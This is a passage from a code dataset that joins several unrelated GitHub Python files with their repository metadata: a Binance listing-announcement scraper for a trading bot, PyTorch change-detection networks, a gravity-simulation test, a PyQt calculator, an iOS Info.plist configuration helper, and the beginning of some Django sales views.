BinanceAnnouncementBot:\n def __init__(self, redis_client: redis.Redis, trade_config):\n self.redis_client = redis_client\n self.domain = \"https://www.binancezh.com\"\n self.rotate_ip = trade_config[\"TRADE_OPTIONS\"][\"ROTATE_IP\"]\n\n if self.rotate_ip:\n logger.info(\"setting up gateway\")\n self.gateway = ApiGateway(self.domain)\n self.gateway.start()\n\n logger.info(\"setting up session\")\n self.session = requests.Session()\n self.session.mount(self.domain, self.gateway)\n\n def __del__(self):\n if self.rotate_ip:\n logger.info(\"Closing gateway\")\n self.gateway.shutdown()\n\n def get_last_coin(self):\n \n rand_page_size = random.randint(1, 200)\n letters = string.ascii_letters\n random_string = ''.join(random.choice(letters) for i in range(random.randint(10, 20)))\n random_number = random.randint(1, 99999999999999999999)\n queries = [\"type=1\", \"catalogId=48\", \"pageNo=1\", f\"pageSize={str(rand_page_size)}\", f\"rnd={str(time.time())}\",\n f\"{random_string}={str(random_number)}\"]\n random.shuffle(queries)\n URL = f\"{self.domain}/gateway-api/v1/public/cms/article/list/query\" \\\n f\"?{queries[0]}&{queries[1]}&{queries[2]}&{queries[3]}&{queries[4]}&{queries[5]}\"\n\n if self.rotate_ip:\n latest_announcement = self.session.get(URL)\n else:\n latest_announcement = requests.get(URL)\n \n latest_announcement = latest_announcement.json()\n latest_announcement = latest_announcement['data']['catalogs'][0]['articles'][0]['title']\n symbols = []\n\n if 'Binance Will List'.lower() in latest_announcement.lower():\n str_len = len(latest_announcement)\n for index in range(str_len):\n if latest_announcement[index] == '(':\n symbol = ''\n while index < str_len and latest_announcement[index+1] != ')':\n index += 1\n symbol += latest_announcement[index]\n\n redis_data = self.redis_client.hget(\n 'binance_new_listings', symbol)\n if redis_data == None:\n symbols.append(symbol)\n self.redis_client.hset(\n 'binance_new_listings', symbol, \"Listed\")\n else:\n binance_last_announcement = self.redis_client.get(\n 'binance_last_announcement')\n if binance_last_announcement == None or binance_last_announcement != latest_announcement:\n logger.info(\n f\"latest announcement from binance {latest_announcement}\")\n self.redis_client.set('binance_last_announcement', latest_announcement)\n\n return symbols\n\n def run_bot(self):\n iterations = 0\n while True:\n try:\n latest_coin = self.get_last_coin()\n iterations += 1\n\n if len(latest_coin) > 0:\n logger.info(f\"New coin(s) detected {latest_coin}\")\n self.redis_client.set(\n 'GATEIO-coin-to-trade', json.dumps(latest_coin))\n\n logger.info(f\"Running {iterations}\")\n time.sleep(3)\n except Exception as e:\n logger.error(f\"Some error occured: {e}\")\n self.redis_client.delete('binance_last_announcement')\n time.sleep(5)\n","repo_name":"vikramk9852/gate.io-trading-bot","sub_path":"bots/binance_announcement_scrapper.py","file_name":"binance_announcement_scrapper.py","file_ext":"py","file_size_in_byte":3758,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"30151770925","text":"import torch.nn as nn\nimport torch\nfrom torch.nn import init\nfrom torch.nn.parameter import Parameter\nfrom torch.nn import functional as F\nclass AtrousSeparableConvolution(nn.Module):\n \"\"\" Atrous Separable Convolution\n \"\"\"\n def __init__(self, in_channels, out_channels, kernel_size,\n stride=1, padding=0, dilation=1, bias=True):\n super(AtrousSeparableConvolution, self).__init__()\n self.body = nn.Sequential(\n # Separable Conv\n nn.Conv2d(in_channels, in_channels, kernel_size=kernel_size, stride=stride, padding=padding, dilation=dilation, bias=bias, groups=in_channels),\n # PointWise Conv\n nn.Conv2d(in_channels, out_channels, kernel_size=1, stride=1, padding=0, bias=bias),\n )\n\n self._init_weight()\n\n def forward(self, x):\n return self.body(x)\n\n def _init_weight(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight)\n elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\nclass DoubleConvolutionLayer(nn.Module):\n \"\"\"\n The DoubleConvolutionLayer is an module extending torch Module. It is a module that contains a layer that applies\n Conv2d -> Batchnorm -> ReLU -> Conv2d -> Batchnorm -> ReLU.\n It changes the number of channels of the input but not it's size.\n \"\"\"\n def __init__(self, n_channels_input,n_middle_channel, n_channels_output):\n \"\"\"\n Initialises a DoubleConvolutionLayer object containing one layer that procedes to the operations described\n above sequentially.\n :param n_channels_input: number of channels in input\n :param n_channels_output: number of channels in output\n \"\"\"\n super(DoubleConvolutionLayer, self).__init__()\n self.double_layer = nn.Sequential(\n AtrousSeparableConvolution(in_channels=n_channels_input,out_channels=n_middle_channel,kernel_size=3,stride=1, padding=1, dilation=1, bias=True),\n #nn.Conv2d(n_channels_input, n_channels_output, kernel_size=3, padding=1),\n nn.BatchNorm2d(n_middle_channel),\n nn.ReLU(inplace=True),\n nn.Dropout2d(p=0.05),\n AtrousSeparableConvolution(in_channels=n_middle_channel, out_channels=n_channels_output,kernel_size=3,stride=1, padding=1, dilation=1, bias=True),\n #nn.Conv2d(n_channels_output, n_channels_output, kernel_size=3, padding=1),\n nn.BatchNorm2d(n_channels_output),\n nn.ReLU(inplace=True),\n nn.Dropout2d(p=0.05)\n )\n\n\n def forward(self, x):\n \"\"\"\n Defines the flow of data in the DoubleConvolution object.\n :param x: the input data given through the layer with n_channels_input channels\n :return: x after passing through the layer with now n_channels_output channels.\n \"\"\"\n x = self.double_layer(x)\n return x\nclass conv_block_nested(nn.Module):\n def __init__(self, in_ch, mid_ch, out_ch):\n super(conv_block_nested, self).__init__()\n self.activation = nn.ReLU(inplace=True)\n self.conv1 = nn.Conv2d(in_ch, mid_ch, kernel_size=3, padding=1, bias=True)\n self.bn1 = nn.BatchNorm2d(mid_ch)\n self.conv2 = nn.Conv2d(mid_ch, out_ch, kernel_size=3, padding=1, bias=True)\n self.bn2 = nn.BatchNorm2d(out_ch)\n self.ca = ChannelAttention(out_ch, ratio=8)\n\n def forward(self, x):\n x = self.conv1(x)\n identity = x\n x = self.bn1(x)\n x = self.activation(x)\n x = self.conv2(x)\n x = self.bn2(x)\n output = self.activation(x + identity)\n # output = self.ca(output)*output+output\n return output\n\n\n\nclass up(nn.Module):\n def __init__(self, in_ch, bilinear=False):\n super(up, self).__init__()\n\n if bilinear:\n self.up = nn.Upsample(scale_factor=2,mode='bilinear', align_corners=True)\n else:\n self.up = nn.ConvTranspose2d(in_ch, in_ch, 2, stride=2)\n\n def forward(self, x):\n\n x = self.up(x)\n return x\nclass eca_layer(nn.Module):\n \"\"\"Constructs a ECA module.\n Args:\n channel: Number of channels of the input feature map\n k_size: Adaptive selection of kernel size\n \"\"\"\n def __init__(self, channel, k_size=3):\n super(eca_layer, self).__init__()\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\n self.conv = nn.Conv1d(1, 1, kernel_size=k_size, padding=(k_size - 1) // 2, bias=False)\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, x):\n # feature descriptor on the global spatial information\n y = self.avg_pool(x)\n\n # Two different branches of ECA module\n y = self.conv(y.squeeze(-1).transpose(-1, -2)).transpose(-1, -2).unsqueeze(-1)\n\n # Multi-scale information fusion\n y = self.sigmoid(y)\n\n return x * y.expand_as(x)\nclass ExternalAttention(nn.Module):\n def __init__(self, d_model,S=64):\n super().__init__()\n self.mk=nn.Linear(d_model,S,bias=False)\n self.mv=nn.Linear(S,d_model,bias=False)\n self.softmax=nn.Softmax(dim=1)\n self.init_weights()\n def init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n init.kaiming_normal_(m.weight, mode='fan_out')\n if m.bias is not None:\n init.constant_(m.bias, 0)\n elif isinstance(m, nn.BatchNorm2d):\n init.constant_(m.weight, 1)\n init.constant_(m.bias, 0)\n elif isinstance(m, nn.Linear):\n init.normal_(m.weight, std=0.001)\n if m.bias is not None:\n init.constant_(m.bias, 0)\n\n def forward(self, queries):\n attn=self.mk(queries) #bs,n,S\n attn=self.softmax(attn) #bs,n,S\n attn=attn/torch.sum(attn,dim=2,keepdim=True) #bs,n,S\n out=self.mv(attn) #bs,n,d_model\n\n return out\n\nclass AdaptiveFF(nn.Module):\n def __init__(self, in_channels,ratio = 4):\n super(AdaptiveFF, self).__init__()\n self.avg_pool = nn.AdaptiveAvgPool2d((1,1))\n\n self.fc1 = nn.Conv2d(in_channels,in_channels//ratio,1,bias=False)\n self.relu1 = nn.ReLU()\n self.fc2 = nn.Conv2d(in_channels//ratio, in_channels,1,bias=False)\n self.sigmod = nn.Sigmoid()\n\n def forward(self,x):\n avg_out = self.fc2(self.relu1(self.fc1(self.avg_pool(x))))\n out = self.sigmod(avg_out)\n out = out*x\n return out\n\nclass ChannelAttention(nn.Module):\n def __init__(self, in_channels, ratio = 16):\n super(ChannelAttention, self).__init__()\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\n self.max_pool = nn.AdaptiveMaxPool2d(1)\n self.fc1 = nn.Conv2d(in_channels,in_channels//ratio,1,bias=False)\n self.relu1 = nn.ReLU()\n self.fc2 = nn.Conv2d(in_channels//ratio, in_channels,1,bias=False)\n self.sigmod = nn.Sigmoid()\n def forward(self,x):\n avg_out = self.fc2(self.relu1(self.fc1(self.avg_pool(x))))\n max_out = self.fc2(self.relu1(self.fc1(self.max_pool(x))))\n out = avg_out + max_out\n return self.sigmod(out)\n\nclass Adaptive_ChannelAttention(nn.Module):\n def __init__(self, in_channels, S = 16 ,r = 8):\n super(Adaptive_ChannelAttention, self).__init__()\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\n self.max_pool = nn.AdaptiveMaxPool2d(1)\n self.fc1 = nn.Conv2d(in_channels,in_channels//r,1,bias=False)\n self.relu1 = nn.ReLU()\n self.fc2 = nn.Conv2d(in_channels//r, in_channels,1,bias=False)\n self.fc3 = nn.Conv2d(in_channels*2, in_channels // S, 1, bias=False)\n self.fc4 = nn.Conv2d(in_channels//S, 2,1,bias=False)\n self.sigmod = nn.Sigmoid()\n self.softmax = nn.Softmax()\n def forward(self,x):\n avg_out = self.sigmod(self.fc2(self.relu1(self.fc1(self.avg_pool(x)))))\n max_out = self.sigmod(self.fc2(self.relu1(self.fc1(self.max_pool(x)))))\n out1 = torch.cat([avg_out, max_out], 3)\n out2 = torch.cat([avg_out, max_out], 1)\n\n DA = self.softmax(self.fc4(self.relu1(self.fc3(out2))))\n DA = DA.permute(0,2,3,1)\n out1 = out1.permute(0,2,3,1)\n out =torch.matmul(DA,out1)\n out = out.permute(0,3,1,2)\n return out\n\nclass SpatialAttention(nn.Module):\n def __init__(self):\n super(SpatialAttention,self).__init__()\n self.conv1 = nn.Conv2d(2,1,7,padding=3,bias=False)\n self.sigmoid = nn.Sigmoid()\n def forward(self, x):\n avg_out = torch.mean(x,dim=1,keepdim=True)\n max_out = torch.max(x,dim=1,keepdim=True,out=None)[0]\n\n x = torch.cat([avg_out,max_out],dim=1)\n x = self.conv1(x)\n return self.sigmoid(x)\n\nclass Attention_Embedding(nn.Module):\n def __init__(self, in_channels, out_channels, reduction=16, pool_window=6, add_input=False):\n super(Attention_Embedding, self).__init__()\n self.add_input = add_input\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\n self.max_pool = nn.AdaptiveMaxPool2d(1)\n self.SE = nn.Sequential(\n #nn.AvgPool2d(kernel_size=pool_window + 1, stride=1, padding=pool_window // 2),\n nn.Conv2d(in_channels*2, in_channels*2 // reduction, 1),\n nn.BatchNorm2d(in_channels*2 // reduction, momentum=0.95),\n nn.ReLU(inplace=False),\n nn.Conv2d(in_channels*2 // reduction, out_channels, 1),\n nn.Sigmoid())\n\n def forward(self, high_feat, low_feat):\n b, c, h, w = low_feat.size()\n avg_out = self.avg_pool(high_feat)\n max_out = self.max_pool(high_feat)\n high_feat = torch.cat([avg_out, max_out], dim=1)\n A = self.SE(high_feat)\n A = F.upsample(A, (h, w), mode='bilinear')\n\n output = low_feat * A\n if self.add_input:\n output += low_feat\n\n return output\n\nclass SNUNet_ECAM(nn.Module):\n # SNUNet-CD with ECAM\n def __init__(self, in_ch=3, out_ch=2):\n super(SNUNet_ECAM, self).__init__()\n torch.nn.Module.dump_patches = True\n n1 = 32 # the initial number of channels of feature map\n filters = [n1, n1 * 2, n1 * 4, n1 * 8, n1 * 16]\n\n self.pool = nn.MaxPool2d(kernel_size=2, stride=2)\n\n self.conv0_0 = conv_block_nested(in_ch, filters[0], filters[0])\n self.conv1_0 = conv_block_nested(filters[0], filters[1], filters[1])\n self.conv2_0 = conv_block_nested(filters[1], filters[2], filters[2])\n self.conv3_0 = conv_block_nested(filters[2], filters[3], filters[3])\n self.conv4_0 = conv_block_nested(filters[3], filters[4], filters[4])\n\n self.conv0_1 = conv_block_nested(filters[0] * 2 + filters[1], filters[0], filters[0])\n self.AE0_1 = Attention_Embedding(filters[1] * 2, filters[0]*2)\n self.conv1_1 = conv_block_nested(filters[1] * 2 + filters[2], filters[1], filters[1])\n self.AE1_1 = Attention_Embedding(filters[2] * 2, filters[1] * 2)\n self.conv2_1 = conv_block_nested(filters[2] * 2 + filters[3], filters[2], filters[2])\n self.AE2_1 = Attention_Embedding(filters[3] * 2, filters[2] * 2)\n self.conv3_1 = conv_block_nested(filters[3] * 2 + filters[4], filters[3], filters[3])\n self.AE3_1 = Attention_Embedding(filters[4] * 2, filters[3] * 2)\n\n self.conv0_2 = conv_block_nested(filters[0] * 3 + filters[1], filters[0], filters[0])\n self.AE0_2 = Attention_Embedding(filters[1], filters[0] * 3 )\n self.conv1_2 = conv_block_nested(filters[1] * 3 + filters[2], filters[1], filters[1])\n self.AE1_2 = Attention_Embedding( filters[2], filters[1] * 3 )\n self.conv2_2 = conv_block_nested(filters[2] * 3 + filters[3], filters[2], filters[2])\n self.AE2_2 = Attention_Embedding(filters[3], filters[2] * 3)\n\n self.conv0_3 = conv_block_nested(filters[0] * 4 + filters[1], filters[0], filters[0])\n self.AE0_3 = Attention_Embedding(filters[1], filters[0] * 4 )\n self.conv1_3 = conv_block_nested(filters[1] * 4 + filters[2], filters[1], filters[1])\n self.AE1_3 = Attention_Embedding(filters[2], filters[1] * 4 )\n\n self.conv0_4 = conv_block_nested(filters[0] * 5 + filters[1], filters[0], filters[0])\n self.AE0_4 = Attention_Embedding( filters[1], filters[0] * 5)\n\n\n self.Up1_0 = up(filters[1])\n self.Up2_0 = up(filters[2])\n self.Up3_0 = up(filters[3])\n self.Up4_0 = up(filters[4])\n\n self.Up1_1 = up(filters[1])\n self.Up2_1 = up(filters[2])\n self.Up3_1 = up(filters[3])\n\n self.Up1_2 = up(filters[1])\n self.Up2_2 = up(filters[2])\n self.Up1_3 = up(filters[1])\n\n self.ca = ChannelAttention(filters[0] * 4, ratio=8)\n self.ca1 = ChannelAttention(filters[0], ratio=16 // 4)\n self.conv_final = nn.Conv2d(filters[0] * 4, out_ch, kernel_size=1)\n\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n\n def forward(self,xB,xA):\n '''xA'''\n x0_0A = self.conv0_0(xA)\n x1_0A = self.conv1_0(self.pool(x0_0A))\n x2_0A = self.conv2_0(self.pool(x1_0A))\n x3_0A = self.conv3_0(self.pool(x2_0A))\n x4_0A = self.conv4_0(self.pool(x3_0A))\n\n '''xB'''\n x0_0B = self.conv0_0(xB)\n x1_0B = self.conv1_0(self.pool(x0_0B))\n x2_0B = self.conv2_0(self.pool(x1_0B))\n x3_0B = self.conv3_0(self.pool(x2_0B))\n x4_0B = self.conv4_0(self.pool(x3_0B))\n\n x0_1 = self.AE0_1(torch.cat([x1_0A, x1_0B], 1), torch.cat([x0_0A, x0_0B], 1))\n x0_1 = self.conv0_1(torch.cat([x0_1, self.Up1_0(x1_0B)], 1))\n\n x1_1 = self.AE1_1(torch.cat([x2_0A, x2_0B], 1), torch.cat([x1_0A, x1_0B], 1))\n x1_1 = self.conv1_1(torch.cat([x1_1,self.Up2_0(x2_0B)], 1))\n\n x0_2 = self.AE0_2(x1_1, torch.cat([x0_0A, x0_0B, x0_1], 1))\n x0_2 = self.conv0_2(torch.cat([x0_2,self.Up1_1(x1_1)], 1))\n\n x2_1 = self.AE2_1(torch.cat([x3_0A, x3_0B], 1), torch.cat([x2_0A, x2_0B], 1))\n x2_1 = self.conv2_1(torch.cat([x2_1,self.Up3_0(x3_0B)], 1))\n\n x1_2 = self.AE1_2(x2_1, torch.cat([x1_0A, x1_0B, x1_1], 1))\n x1_2 = self.conv1_2(torch.cat([x1_2, self.Up2_1(x2_1)], 1))\n\n x0_3 = self.AE0_3(x1_2, torch.cat([x0_0A, x0_0B, x0_1, x0_2], 1))\n x0_3 = self.conv0_3(torch.cat([x0_3, self.Up1_2(x1_2)], 1))\n\n x3_1 = self.AE3_1(torch.cat([x4_0A, x4_0B], 1), torch.cat([x3_0A, x3_0B], 1))\n x3_1 = self.conv3_1(torch.cat([x3_1, self.Up4_0(x4_0B)], 1))\n x2_2 = self.AE2_2(x3_1, torch.cat([x2_0A, x2_0B, x2_1], 1))\n x2_2 = self.conv2_2(torch.cat([x2_2, self.Up3_1(x3_1)], 1))\n x1_3 = self.AE1_3(x2_2, torch.cat([x1_0A, x1_0B, x1_1, x1_2], 1))\n x1_3 = self.conv1_3(torch.cat([x1_3, self.Up2_2(x2_2)], 1))\n x0_4 = self.AE0_4(x1_3, torch.cat([x0_0A, x0_0B, x0_1, x0_2, x0_3], 1))\n x0_4 = self.conv0_4(torch.cat([x0_4, self.Up1_3(x1_3)], 1))\n\n\n out = torch.cat([x0_1, x0_2, x0_3, x0_4], 1)\n\n intra = torch.sum(torch.stack((x0_1, x0_2, x0_3, x0_4)), dim=0)\n ca1 = self.ca1(intra)\n out = self.ca(out) * (out + ca1.repeat(1, 4, 1, 1))\n #out = sa*out+out\n out = self.conv_final(out)\n\n return out\n\n\nclass Siam_NestedUNet_Conc(nn.Module):\n # SNUNet-CD without Attention\n def __init__(self, in_ch=3, out_ch=2):\n super(Siam_NestedUNet_Conc, self).__init__()\n torch.nn.Module.dump_patches = True\n n1 = 32 # the initial number of channels of feature map\n filters = [n1, n1 * 2, n1 * 4, n1 * 8, n1 * 16]\n\n self.pool = nn.MaxPool2d(kernel_size=2, stride=2)\n\n self.conv0_0 = conv_block_nested(in_ch, filters[0], filters[0])\n self.conv1_0 = conv_block_nested(filters[0], filters[1], filters[1])\n self.Up1_0 = up(filters[1])\n self.conv2_0 = conv_block_nested(filters[1], filters[2], filters[2])\n self.Up2_0 = up(filters[2])\n self.conv3_0 = conv_block_nested(filters[2], filters[3], filters[3])\n self.Up3_0 = up(filters[3])\n self.conv4_0 = conv_block_nested(filters[3], filters[4], filters[4])\n self.Up4_0 = up(filters[4])\n\n self.conv0_1 = conv_block_nested(filters[0] * 2 + filters[1], filters[0], filters[0])\n self.conv1_1 = conv_block_nested(filters[1] * 2 + filters[2], filters[1], filters[1])\n self.Up1_1 = up(filters[1])\n self.conv2_1 = conv_block_nested(filters[2] * 2 + filters[3], filters[2], filters[2])\n self.Up2_1 = up(filters[2])\n self.conv3_1 = conv_block_nested(filters[3] * 2 + filters[4], filters[3], filters[3])\n self.Up3_1 = up(filters[3])\n\n self.conv0_2 = conv_block_nested(filters[0] * 3 + filters[1], filters[0], filters[0])\n self.conv1_2 = conv_block_nested(filters[1] * 3 + filters[2], filters[1], filters[1])\n self.Up1_2 = up(filters[1])\n self.conv2_2 = conv_block_nested(filters[2] * 3 + filters[3], filters[2], filters[2])\n self.Up2_2 = up(filters[2])\n\n self.conv0_3 = conv_block_nested(filters[0] * 4 + filters[1], filters[0], filters[0])\n self.conv1_3 = conv_block_nested(filters[1] * 4 + filters[2], filters[1], filters[1])\n self.Up1_3 = up(filters[1])\n\n self.conv0_4 = conv_block_nested(filters[0] * 5 + filters[1], filters[0], filters[0])\n\n self.final1 = nn.Conv2d(filters[0], out_ch, kernel_size=1)\n self.final2 = nn.Conv2d(filters[0], out_ch, kernel_size=1)\n self.final3 = nn.Conv2d(filters[0], out_ch, kernel_size=1)\n self.final4 = nn.Conv2d(filters[0], out_ch, kernel_size=1)\n self.conv_final = nn.Conv2d(out_ch * 4, out_ch, kernel_size=1)\n\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n\n def forward(self, xA, xB):\n '''xA'''\n x0_0A = self.conv0_0(xA)\n x1_0A = self.conv1_0(self.pool(x0_0A))\n x2_0A = self.conv2_0(self.pool(x1_0A))\n x3_0A = self.conv3_0(self.pool(x2_0A))\n # x4_0A = self.conv4_0(self.pool(x3_0A))\n '''xB'''\n x0_0B = self.conv0_0(xB)\n x1_0B = self.conv1_0(self.pool(x0_0B))\n x2_0B = self.conv2_0(self.pool(x1_0B))\n x3_0B = self.conv3_0(self.pool(x2_0B))\n x4_0B = self.conv4_0(self.pool(x3_0B))\n\n x0_1 = self.conv0_1(torch.cat([x0_0A, x0_0B, self.Up1_0(x1_0B)], 1))\n x1_1 = self.conv1_1(torch.cat([x1_0A, x1_0B, self.Up2_0(x2_0B)], 1))\n x0_2 = self.conv0_2(torch.cat([x0_0A, x0_0B, x0_1, self.Up1_1(x1_1)], 1))\n\n\n x2_1 = self.conv2_1(torch.cat([x2_0A, x2_0B, self.Up3_0(x3_0B)], 1))\n x1_2 = self.conv1_2(torch.cat([x1_0A, x1_0B, x1_1, self.Up2_1(x2_1)], 1))\n x0_3 = self.conv0_3(torch.cat([x0_0A, x0_0B, x0_1, x0_2, self.Up1_2(x1_2)], 1))\n\n x3_1 = self.conv3_1(torch.cat([x3_0A, x3_0B, self.Up4_0(x4_0B)], 1))\n x2_2 = self.conv2_2(torch.cat([x2_0A, x2_0B, x2_1, self.Up3_1(x3_1)], 1))\n x1_3 = self.conv1_3(torch.cat([x1_0A, x1_0B, x1_1, x1_2, self.Up2_2(x2_2)], 1))\n x0_4 = self.conv0_4(torch.cat([x0_0A, x0_0B, x0_1, x0_2, x0_3, self.Up1_3(x1_3)], 1))\n\n\n output1 = self.final1(x0_1)\n output2 = self.final2(x0_2)\n output3 = self.final3(x0_3)\n output4 = self.final4(x0_4)\n output = self.conv_final(torch.cat([output1, output2, output3, output4], 1))\n return (output1, output2, output3, output4, output)","repo_name":"lixinghua5540/DTCDN","sub_path":"Change detection/Models/Sun_Net.py","file_name":"Sun_Net.py","file_ext":"py","file_size_in_byte":20231,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"77"} +{"seq_id":"14867164024","text":"\n# Experiment to see how many objects the simulator can handle\n# with reasonable speed.\n\nimport gravity\n\nL = []\nfor i in range(20):\n b = gravity.Body()\n b.name = str(i)\n b.mass = 10**26\n b.px = gravity.AU * (i/25)\n b.vy = ((i % 10) - 5) * 2000\n b.vx = ((i % 4) - 2) * 500\n L.append(b)\n\ngravity.loop(L)\n","repo_name":"akuchling/50-examples","sub_path":"code/experiments/many-gravity.py","file_name":"many-gravity.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"77"} +{"seq_id":"24396529373","text":"from PyQt5 import QtWidgets, uic\nimport pkg_resources\ndef main():\n #vytvoreni aplikace a okna\n app=QtWidgets.QApplication([])\n window=QtWidgets.QDialog()\n #nacteni ovladatek\n #with open('kalkulacka/kalkulacka.ui',encoding='UTF-8') as f: #f je soubor, with samo zajisti zavreni souboru, ) prvni verze s primou cestou\n with pkg_resources.resource_stream('kalkulacka','kalkulacka.ui') as f: #druha verze pro zabaleni, bere jmeno modulu a souboru kterz je na stejne urovni, vedle nej\n uic.loadUi(f,window)\n\n sb_operand1=window.findChild(QtWidgets.QDoubleSpinBox,'sb_operand1')\n cb_operator=window.findChild(QtWidgets.QComboBox,'cb_operator')\n sb_operand2=window.findChild(QtWidgets.QDoubleSpinBox,'sb_operand2')\n sb_result=window.findChild(QtWidgets.QDoubleSpinBox,'sb_result')\n sb_operand2.setValue(123)\n\n def calculate():\n operand1=sb_operand1.value()\n operand2=sb_operand2.value()\n operator=cb_operator.currentText()\n try:\n if operator=='+':\n result=operand1+operand2\n elif operator=='-':\n result=operand1-operand2\n elif operator=='/':\n result=operand1/operand2\n elif operator=='*':\n result=operand1*operand2\n else:\n raise ValueError('bad operator')\n except Exception:\n sb_result.setPrefix('ERR') #nastavi error treba pri deleni nulou\n sb_result.setValue(0)\n else:\n sb_result.setPrefix('') #vymaze ERR\n sb_result.setValue(result)\n\n sb_operand1.valueChanged.connect(calculate)\n sb_operand2.valueChanged.connect(calculate)\n cb_operator.currentTextChanged.connect(calculate)\n\n\n #Spusteni\n window.show()\n return app.exec()\n","repo_name":"libusepoustkova/kalkulacka","sub_path":"kalkulacka/logic.py","file_name":"logic.py","file_ext":"py","file_size_in_byte":1797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15221988474","text":"\nimport json\nimport plistlib\nimport os\n\nfrom contextlib import contextmanager\n\nclass BaseConfig(object):\n \"\"\"\n Holds the configuration data for a given base project.\n \"\"\"\n def __init__(self, display_name, bundle_id,\n app_transport_exception=None, facebook_app_id=None):\n self.display_name = display_name\n self.bundle_id = bundle_id\n self.app_transport_exception = app_transport_exception\n self.facebook_app_id = facebook_app_id\n\n def to_dict(self):\n config_dict = {\n 'display_name': self.display_name,\n 'bundle_id': self.bundle_id,\n 'app_transport_exception': self.app_transport_exception,\n 'facebook_app_id': self.facebook_app_id\n }\n return config_dict\n\n def to_json(self):\n return json.dumps(self.to_dict())\n\nclass BaseProject(object):\n \"\"\"\n Initialize with a directory path to a base project.\n \"\"\"\n def __init__(self, directory):\n self.directory = directory\n self.info = os.path.join(self.directory, 'SiphonBase', 'Info.plist')\n\n @contextmanager\n def configure(self, config):\n \"\"\"\n Temporarily configure a base project\n \"\"\"\n with open(self.info, 'r') as f:\n info = f.read()\n try:\n self.set_bundle_id(config.bundle_id)\n self.set_display_name(config.display_name)\n self.set_facebook_sdk_info(config.facebook_app_id,\n config.display_name)\n self.set_app_transport_exception(config.app_transport_exception)\n yield\n finally:\n with open(self.info, 'w') as f:\n f.write(info)\n\n def set_bundle_id(self, bundle_id):\n self.set_info('CFBundleIdentifier', bundle_id)\n\n def set_display_name(self, display_name):\n self.set_info('CFBundleDisplayName', display_name)\n\n def set_app_transport_exception(self, domain):\n key = 'NSAppTransportSecurity'\n value = {'NSAllowsArbitraryLoads': False}\n if domain:\n value['NSExceptionDomains'] = {\n domain: {\n 'NSTemporaryExceptionAllowsInsecureHTTPLoads': True\n }\n }\n self.set_info(key, value)\n\n def set_facebook_sdk_info(self, fb_app_id, fb_display_name):\n # If the app id is not set, do nothing\n if not fb_app_id:\n return\n\n with open(self.info, 'r') as f:\n contents = f.read()\n\n # Handle updated template variables\n processed = contents.replace('{{facebook-app-id}}', fb_app_id)\n processed = contents.replace('facebook.app.id.placeholder', fb_app_id)\n processed = processed.replace('{{facebook-display-name}}',\n fb_display_name)\n processed = processed.replace('facebook.display.name.placeholder',\n fb_display_name)\n\n with open(self.info, 'w') as f:\n # Replace our template vars {{facebook-app-id}} and\n # {{facebook-display-name}}\n f.write(processed)\n\n def set_info(self, k, v):\n \"\"\"\n Set a value for a given key in an app's base project info.plist\n \"\"\"\n info = self.get_info()\n\n with open(self.info, 'wb') as f:\n # Note that we have to write the entire contents to the file.\n # so we load the current data, add whatever we need to it then\n info[k] = v\n plistlib.dump(info, f)\n\n def get_info(self, k=None):\n \"\"\"\n Get the value for a key in the an app's base project info.plist\n \"\"\"\n info = None\n with open(self.info, 'rb') as f:\n info = plistlib.load(f)\n if k:\n return info.get(k)\n else:\n return info\n","repo_name":"siphoncode/siphon-cli","sub_path":"siphon/cli/wrappers/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"41643265312","text":"# django\nfrom django.shortcuts import render\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.urls import reverse_lazy, reverse\nfrom django.views.generic import (\n View,\n UpdateView,\n DeleteView,\n DetailView,\n ListView\n)\nfrom django.views.generic.edit import (\n FormView\n)\n# local\nfrom applications.producto.models import Product\nfrom applications.utils import render_to_pdf\nfrom applications.users.mixins import VentasPermisoMixin\n#\nfrom .models import Sale, SaleDetail, CarShop\nfrom .forms import VentaForm, VentaVoucherForm\nfrom .functions import procesar_venta\n\n\nclass AddCarView(VentasPermisoMixin, FormView):\n template_name = 'venta/index.html'\n form_class = VentaForm\n success_url = '.'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context[\"productos\"] = CarShop.objects.all()\n context[\"total_cobrar\"] = CarShop.objects.total_cobrar()\n # formulario para venta con voucher\n context['form_voucher'] = VentaVoucherForm\n return context\n \n def form_valid(self, form):\n \"\"\" Verifica la información del formulario \"\"\"\n # Toma los valores procedentes del form\n barcode = form.cleaned_data['barcode']\n count = form.cleaned_data['count']\n # Si el producto ya se agrego se le suma la cantidad, sino se agrega como nuevo en la venta\n obj, created = CarShop.objects.get_or_create(\n barcode=barcode,\n defaults={\n 'product': Product.objects.get(barcode=barcode),\n 'count': count\n }\n )\n #\n if not created:\n obj.count = obj.count + count\n obj.save()\n return super(AddCarView, self).form_valid(form)\n \n\n\nclass CarShopUpdateView(VentasPermisoMixin, View):\n \"\"\" quita en 1 la cantidad en un carshop \"\"\"\n\n def post(self, request, *args, **kwargs):\n car = 